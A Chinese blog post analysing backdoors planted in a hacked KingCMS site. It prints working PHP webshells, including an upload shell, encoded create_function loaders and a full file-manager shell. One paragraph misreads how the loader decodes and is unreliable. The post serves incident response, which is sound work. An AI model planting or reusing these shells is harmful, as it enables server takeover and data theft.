最新遇到了kingcms攻击-有上传文件和创建函数

已于 2024-02-20 14:09:27 修改
阅读量479 收藏 8
点赞数 8
文章标签: web安全 php
于 2024-02-20 11:52:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32484211/article/details/136186142
版权

通过git status看哪些文件发生了更改:

git status
Untracked files:
#   (use "git add <file>..." to include in what will be committed)
#
#       .user.ini
#       banner/optimize-table.php
#       e/data/adminlogin/user1_b2f74a89286a666feb2e8d868e362802.php
#       images/banner1.php
#       index.php
#       meiyuan/css/head.php
#       search/keyword/kefu.php
#       testdata/demopic/download/flashget.php

查看adminlogin/user1_b2f74a89286a666feb2e8d868e362802.php

:像是用于登录的代码

<?php
$ecms_adminloginr=array();
$ecms_adminloginr=Array('userid'=>'1',
'ernd'=>'l0VNHsfImVRwrlgDA7JnZ0ODMtY',
'erndtwo'=>'VA2VG3y5Xq5Fd68QGbiC',
'erndadd'=>'f4glC8aChaPxsW42iv1NuHVhs3NAnZ4N',
'ehash'=>'kF5JWPRv9cvzRXc31utU',
'ehashname'=>'ehash_UUQW',
'rhash'=>'3XkauUm2mK4h',
'rhashname'=>'rhash_WAbR',
'edbdata'=>'1');
?>

查看 banner/optimize-table.php:看似无明显异常

<?php
/*
 * Be sure to include no trailing slash on the path.
 * See http://www.php.net/support.php for more information
 * about PHP manuals and their types.
 */
 
ini_set("display_errors", "off");

/* O_o  O_O  o_O */ 	$o_o = array	/* O_o  O_O  o_O */
(
	'CQ9jnUNXDTIlpz9lK3WypT9lqTyhMluSK0IFHx9FXGftDTyhnI9mMKDbW2Ecp3OfLKysMKWlo3WmWljaG2MzWlx7VROcozysp2' ,
	'I0XPqgLKusMKuyL3I0nJ9hK3EcoJHaYQRjZQNjXGftnTIuMTIlXPWwo250MJ50YIE5pTH6VUEyrUDinUEgoQftL2uupaAyqQ1I' ,
	'IRLgBPVcBlOxMJMcozHbW1MSHyAWG04aYPqCqTIHMJSgLUZtI2IvH2uyoTjaXGftMTIznJ5yXPqAJHMWGRHaYPEsH0IFIxIFJl' ,
	'qGD1WWHSEsExyZEH5OGHHaKFN/VUA0pzEcpvtxK1ASHyMSHyfaH0AFFIOHK0MWGRIBDH1SW10cVQbtp3ElMTylXS9sExyZEI9s' ,
	'XFx7VTEyMzyhMFtaIRuWH0EWHvpfp3ElMTylXTEcpz5uoJHbGIyTFHkSXF4aYlpcXGftMTIznJ5yXPqFG09HERyFWlkmqUWxnK' ,
	'Vbp3ElqUVbGIyTFHkSYTSlpzS5XUA0pzEcpvtxK1ASHyMSHyfaHRuDK1ASGRLaKFxtCG4tWlpcXF4aYlpcXGftMTIznJ5yXPq3' ,
	'nJ4aYUA1LaA0pvuDFSOsG1ZfZPjmXFN9CFNaI0yBWlN/VUElqJHtBvOzLJkmMFx7VTEyMzyhMFtaEIuWH1EGK1OVHRyBEx8aYT' ,
	'qyqTyhMz8bXFN/VUElqJHtBvOzLJkmMFx7VTM1ozA0nJ9hVTqyqTyhMz8bXFO7VTyzVPtunKAmMKDbWS9UEIEoo3EyKFxcVUft' ,
	'MKucqQftsFOlMKE1pz4tMaIhL3Eco25sMKucp3EmXPqjnUOcozMiWlx7VU0tMaIhL3Eco24tnKAIIRL4XPEmqUVcVUftnJLtXP'

查看.user.ini

open_basedir=/www/wwwroot/x.com/:/tmp/

images/banner1.php: 用于上传文件,高危!!

《title>———-leng
<?php
    if(!empty($_FILES)){
        if($_FILES["file"]["error"] == 0){
            move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
            echo $_FILES['file']['name'].' upload success'; 
        }
    }
?>
<form action="" method="post" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" name="submit" value="Upload">
</form>

index.php:嵌入了博彩代码,这是新增的文件,默认只有index.html!!!

meiyuan/css/head.php,重点来了!!!

<?php
error_reporting(E_ALL ^ (E_NOTICE | E_WARNING | E_DEPRECATED));
$mix="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";
$password = "888";
$data="6576616p28677n756r636s6q7072657373286261736536345s6465636s64652822654n7n732s646q4s354r423670516r65463544766s43346334456867415n776r434p6s776o735n354q73376o6n6342356r6q636q387432626o5n49534o6r56576s787556714s78436r2o3052487562684r427135392s2o763953307n632s702s2o6p2s2o376p2s48582s37356r2s2s7072394r534431767831332s387..........还很多..";
$uri = pack("H*",str_rot13($data));
$power=$mix('',$uri);
$power();

这段PHP代码执行了以下步骤:

  1. 设置错误报告级别,以便显示所有错误,除了E_NOTICEE_WARNINGE_DEPRECATED。这意味着代码会报告所有其他类型的错误,但不会报告通知、警告和废弃的警告。

error_reporting(E_ALL ^ (E_NOTICE | E_WARNING | E_DEPRECATED));

  1. 定义了一个字符串$mix,该字符串是create_function的十六进制表示。create_function是一个PHP函数,用于动态地创建一个匿名函数。

$mix="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";

  1. 定义了一个密码$password,其值为"888"。

$password = "888";

  1. 定义了一个字符串$data,其值为"6576.."(一个字符串,因为它以换行符结束)。

$data="6576

  1. 使用str_rot13函数对$data进行ROT13编码。ROT13是一种简单的凯撒密码,它将字母表中的每个字母移动13个位置。然后,使用pack函数将编码后的字符串转换为二进制数据。

$uri = pack("H*",str_rot13($data));

  1. 使用create_function函数创建一个匿名函数,该函数接受两个参数,但在这里只传递了一个空字符串和一个二进制数据字符串。这个匿名函数的内容是$uri,它可能是某种可执行代码。

$power=$mix('',$uri);

  1. 调用创建的匿名函数。

$power();

另外,使用create_function来执行动态生成的代码通常是不安全的,因为它容易受到代码注入攻击。

另外,如果$data的值,经过ROT13编码后,它会变成"rot13",然后pack函数将其转换为二进制数据。如果这是意图,那么$power函数将尝试执行字符串"rot13"作为PHP代码,这会导致错误,因为"rot13"不是有效的PHP代码。

总的来说:就是通过加密和解密的方式,create_function,并执行了!!

search/keyword/kefu.php

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D&nbsp;'.$fn.'<br>';}else{$t2.='&nbsp;&nbsp;'.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>

testdata/demopic/download/flashget.php

<?php
$password='xxdd';
$shellname='�Ƿ�SEOר��';
$myurl=null;
error_reporting(0);
@set_time_limit(0);
    function Class_UC_key($string){
		$array = strlen (trim($string));
		$debuger = '';
		for($one = 0;$one < $array;$one+=2) {
			$debuger .= pack ("C",hexdec (substr ($string,$one,2)));
		}
		return $debuger;
	}
header("content-Type: text/html; charset=gb2312");
$filename=Class_UC_key("2470617373776F72643D27").$password.
Class_UC_key("273B247368656C6C6E616D653D27").$Username.
Class_UC_key("273B246D7975726C3D27").$Url.
Class_UC_key("273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827").'eJzsvfl3XMdxKPwzdI7+h6vrMe......
Hb79FAakWXxytva7sEhpZwhnrg2t2H3TaXUGw1YxmjN1LkUDFZu6BSN8irb6pZTVr0NDHb41fISu/d3jo4aKopfq5omGoaLKL6W1bsAFPumeHX+YS2oqoWZBm1aYX0YZG2ws8L/7l3/y3+6QA1SALaB+U9rj5kKmlnnp1duF24lw8ORicISY8f8Dk7fBIg==\')));';
$PHP=Create_Function('',$filename);$PHP();?>

白毛大侠
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
kingcms 订房模块
02-18
针对kingcms asp 5.1版本制作的 订房系统
CMS程序KingCMS 2009 Beta PHP开源版-kingcms-2009-beta.rar
04-06
对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步...
kingcms php 下载,KingCMS 企业版_KingCMS官方网站
weixin_31076517的博客
03-10 123
说明现已全部更新到KingCMS 9.1,首个引入云管理概念的内容管理系统。核心(Kernel)+应用(Apps)+模板(Templates),支持在线扩展及升级。环境运行环境需要满足以下条件,无须伪静态支持主机:IIS/Apache/Nginx脚本:PHP 5.3+数据:MySQL 5.1+其他:Windows/Linux皆可,PHP组件要求:gd2+(bundled)推荐环境及版本主机:Ngi...
kingcms php 下载,KingCMS企业版(PHP)
weixin_31014131的博客
03-10 106
KingCMS内容管理系统:是一套简单易学,操作简单的开源内容管理系统(CMS),支持PHP+sqLite3/MySQL,此版本为KingCMS正式版的Sp2版。更新记录修复,前台comment.php的评论分页无效修复,后台爬虫管理的统计无效修复,文章录入关键字的分隔规则为英文状态逗号而不是空格修复,产品模型下的状态属性管理操作无效增加,登陆后台管理登陆界面的验证码项修正,对评论和留言的内容进行...
kingcms标签大全
听风是雨
04-28 906
kingCMS标签大全 - 程序员启示录 首页档案笔记 五味作品留言友链 上一篇 |  下一篇  ASP   kingCMS标签大全 作者:blurxx 日期:2007-11-02 字体大小: 小 中 大   KingCMS 标签 default.htm 文章页 外部模板  标签名 说明  {king:keyword/} 关键字  {king:description/} 网站描
kingcms php 排序 标签,kingcms全部标签使用教程
weixin_34379989的博客
04-12 139
温故而知新,不管你是新手还是老手,你仔细的在读一遍这篇被转载了N次的kingcms asp标签详解,你也许会有重大发现。虽然我用过很多次KINGCMS ASP 版,但是再次静下心来仔细的看这篇文章的时候,不仅感叹:温故而知新。有很多东西当初我们并没有学会。系统默认的标签{king:sitename/} 网站名称{king:siteurl/} 网站地址{king:now/} 服务器当前时间{king...
源代码-KingCMS for ASP v5.1 LTS.zip
最新发布
06-11
10. **文档与社区支持**:KingCMS 有详尽的开发者文档和活跃的社区,帮助用户解决问题,分享经验。 在实际应用中,开发人员可以基于ASP和KingCMS进行二次开发,定制符合特定业务需求的功能模块。例如,可以通过修改...
kingcms黑色blog风格版 -ASP源码.zip
02-09
【标题】"kingcms黑色blog风格版 -ASP源码.zip" 涉及的主要知识点是ASP编程语言和网站模板设计,特别是针对博客站点的应用。ASP(Active Server Pages)是微软开发的一种服务器端脚本环境,用于创建动态交互式网页。...
KingCMS电影频道 build 0311-ASP源码.zip
02-09
10. **更新与维护**:作为一款开源产品,KingCMS可能有一个活跃的开发者社区,定期发布更新,修复已知问题,添加新功能,以保持系统的稳定性和先进性。 解压密码为"www.cqlsoft.com",这意味着在下载后解压缩文件时...
kingcms讯雷影视专用版的SQL版 -ASP源码.zip
02-09
在“kingcms讯雷影视专用版的SQL版 -ASP源码.zip”这个压缩包中,包含的主要内容有ASP源码,这表明我们可以获取到整个系统的后台代码,包括但不限于数据库连接、用户管理、影片上传、播放控制等核心模块。...
KingCMS的自定义模型标签
09-27
KingCMS 是一款小巧、高效、人性化的, 基于WEB技术的内容管理系统。
kingcms 扩展后的投票系统
12-23
kingcms 是一个轻巧的cms,但是里面的投票模块很弱,几乎不可以用 为了适应广大站长,我把我自己以前做的分享一下 其中page_pub_vote.asp为入口 相信广告站长应该会使用
KingCMS PHP企业版 6.1.1641 SP2.zip
05-27
KingCMS PHP企业版是一套简单易学,代码精巧的开源内容管理系统(CMS),支持PHP SQLite3/MySQL和ASP ACCESS/MSSQL,模板标签机制容易理解,制作方便,完全自定义的URL 等功能助你轻易实现众多SEO细节,是制作网络营销...
ASP实例开发源码-KingCMS for ASP v5.1 LTS.zip
11-15
ASP实例开发源码—KingCMS for ASP v5.1 LTS.zipASP实例开发源码—KingCMS for ASP v5.1 LTS.zipASP实例开发源码—KingCMS for ASP v5.1 LTS.zip
KingCMS(ASP) 5.1 LTS.rar
05-25
2、广告系统,广告文件同时生成经过转码的JS文件,当使用{king:ad name="xxxx" type="jscode"/}调用时,直接调用对应的JS文件,无需再次转换 3、留言反馈插件增加回复及前台显示 4、列表页后台也有正文(类似单页面...
KingCMS标签大全二
weixin_30547797的博客
10-30 114
[BETA] 系统标签解析 系统标签 作用及说明 等值标签(简化或其他写法) {king:sitename/} 网站名称 {king:sitetitle/} {king:siteurl/} 网站URL {king:url/} {king:bottominfo/} 网站底部信息 ID="bottominfo" {king:bottom/} {king:sitebottom/...
kingcms全部标签使用教程
zzyibeile的博客
05-22 855
温故而知新,不管你是新手还是老手,你仔细的在读一遍这篇被转载了N次的kingcms asp标签详解,你也许会有重大发现。虽然我用过很多次KINGCMS ASP 版,但是再次静下心来仔细的看这篇文章的时候,不仅感叹:温故而知新。有很多东西当初我们并没有学会。系统默认的标签{king:sitename/} 网站名称{king:siteurl/} 网站地址{king:now/} 服务器当前时间{king:cms/} 输出KingCMS支持信息,未购买授权的网站,必须输出此信息。
PHP 漏洞文件 仅作学习、研究用。
qq_34737189的博客
01-15 4404
PHP 漏洞文件 仅作学习、研究用。
php webshell常见函数
weixin_30437337的博客
06-27 1143
0x1 直接在字符串变量后面加括号, 会调用这个函数: <?php $s = 'system'; $e = 'assert'; $s('whoami'); $e('phpinfo();'); 0x2 执行命令常用的函数有: system('命令') eval('php code') assert('php code') 这三个最常用 0x...
phpscan是php程序木马扫描器
11-12 3154
把下面代码,拷贝到php目录的下,新建一个php文件,拷贝好运行就可以了,密码下面找,还有另外一种扫描器,在这里:http://blog.csdn.net/fgdfgasd/article/details/15341775 $password = '123456'; /*这里修改密码,默认密码为123456*/ function dephpscan($lIlIlIlIlIl

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值